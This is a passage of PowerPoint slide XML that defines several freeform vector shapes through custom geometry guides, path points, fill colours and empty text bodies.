            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10292" name="Freeform 373"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="7519988"/>
            <a:ext cx="82550" cy="22225"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 37"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T2" fmla="*/ 0 w 37"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T4" fmla="*/ 0 w 37"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T21" fmla="*/ 0 h 10"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T23" fmla="*/ 0 h 10"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T25" fmla="*/ 0 h 10"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T27" fmla="*/ 0 h 10"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 37"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T66" fmla="*/ 0 w 37"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 10"/>
              <a:gd name="T68" fmla="*/ 0 w 37"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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0"/>
              <a:gd name="T107" fmla="*/ 37 w 37"/>
              <a:gd name="T108" fmla="*/ 10 h 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0">
                <a:moveTo>
                  <a:pt x="0" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10293" name="Freeform 374"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1490662" y="7493000"/>
            <a:ext cx="138113" cy="252413"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 61"/>
              <a:gd name="T1" fmla="*/ 0 h 112"/>
              <a:gd name="T2" fmla="*/ 0 w 61"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 61"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 112"/>
              <a:gd name="T34" fmla="*/ 0 w 61"/>
              <a:gd name="T35" fmla="*/ 0 h 1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1"/>
              <a:gd name="T55" fmla="*/ 0 h 112"/>
              <a:gd name="T56" fmla="*/ 61 w 61"/>
              <a:gd name="T57" fmla="*/ 112 h 1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1" h="112">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="001999"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10294" name="Freeform 375"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1558925" y="7434263"/>
            <a:ext cx="177800" cy="33337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 79"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T2" fmla="*/ 0 w 79"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T35" fmla="*/ 0 h 15"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T37" fmla="*/ 0 h 15"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T39" fmla="*/ 0 h 15"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T41" fmla="*/ 0 h 15"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T43" fmla="*/ 0 h 15"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T45" fmla="*/ 0 h 15"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T47" fmla="*/ 0 h 15"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T49" fmla="*/ 0 h 15"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 79"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T66" fmla="*/ 0 w 79"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 15"/>
              <a:gd name="T68" fmla="*/ 0 w 79"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 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9"/>
              <a:gd name="T106" fmla="*/ 0 h 15"/>
              <a:gd name="T107" fmla="*/ 79 w 79"/>
              <a:gd name="T108" fmla="*/ 15 h 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9" h="15">
                <a:moveTo>
                  <a:pt x="0" y="15"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="333333"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10295" name="Freeform 376"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1457325" y="7750175"/>
            <a:ext cx="298450" cy="101600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 0 w 132"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T37" fmla="*/ 0 h 45"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T66" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T67" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T68" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T69" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T70" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T71" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T72" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T73" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T74" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T75" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T76" fmla="*/ 2147483647 w 132"/>
              <a:gd name="T77" fmla="*/ 2147483647 h 4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45"/>
              <a:gd name="T119" fmla="*/ 132 w 132"/>
              <a:gd name="T120" fmla="*/ 45 h 4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45">
                <a:moveTo>
                  <a:pt x="55" y="44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="56" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55" y="44"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10296" name="Freeform 377"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1393825" y="7777163"/>
            <a:ext cx="304800" cy="90487"/>
          </a:xfrm>
          <a:custGeom>
